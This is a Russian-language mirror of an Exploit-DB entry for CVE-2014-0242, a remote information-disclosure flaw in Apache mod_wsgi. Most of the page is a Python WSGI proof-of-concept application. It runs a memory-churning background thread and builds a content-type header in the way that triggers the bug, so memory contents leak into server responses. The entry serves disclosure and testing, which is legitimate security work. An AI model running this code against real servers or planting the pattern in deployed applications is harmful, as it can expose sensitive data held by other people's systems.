- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 39196
- Проверка EDB
-
- Пройдено
- Автор
- BUCK GOLEMON
- Тип уязвимости
- REMOTE
- Платформа
- LINUX
- CVE
- cve-2014-0242
- Дата публикации
- 2014-05-21
Apache mod_wsgi - Information Disclosure
Код:
source: https://www.securityfocus.com/bid/67534/info
mod_wsgi is prone to a remote information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.
import functools
import threading
import time
import random
def run(*args):
while True:
items = []
for i in range(1000):
items.append((int(random.random()*20)*'X'))
time.sleep(0.00001)
thread = threading.Thread(target=run)
thread.start()
def headers():
return [('Content-Type', 'text/plain'.upper().lower())]
def response():
yield 'Hello World!\n'
_content_type_cache = {}
def intern_content_type(application):
@functools.wraps(application)
def _wrapper(environ, start_response):
def _start_response(status, headers, *args):
_headers = []
for header, value in headers:
if header.lower() == 'content-type':
value = _content_type_cache.setdefault(value, value)
_headers.append((header, value))
return start_response(status, _headers, *args)
return application(environ, _start_response)
return _wrapper
#@intern_content_type
def application(environ, start_response):
status = '200 OK'
start_response(status, headers())
return response()
- Источник
- www.exploit-db.com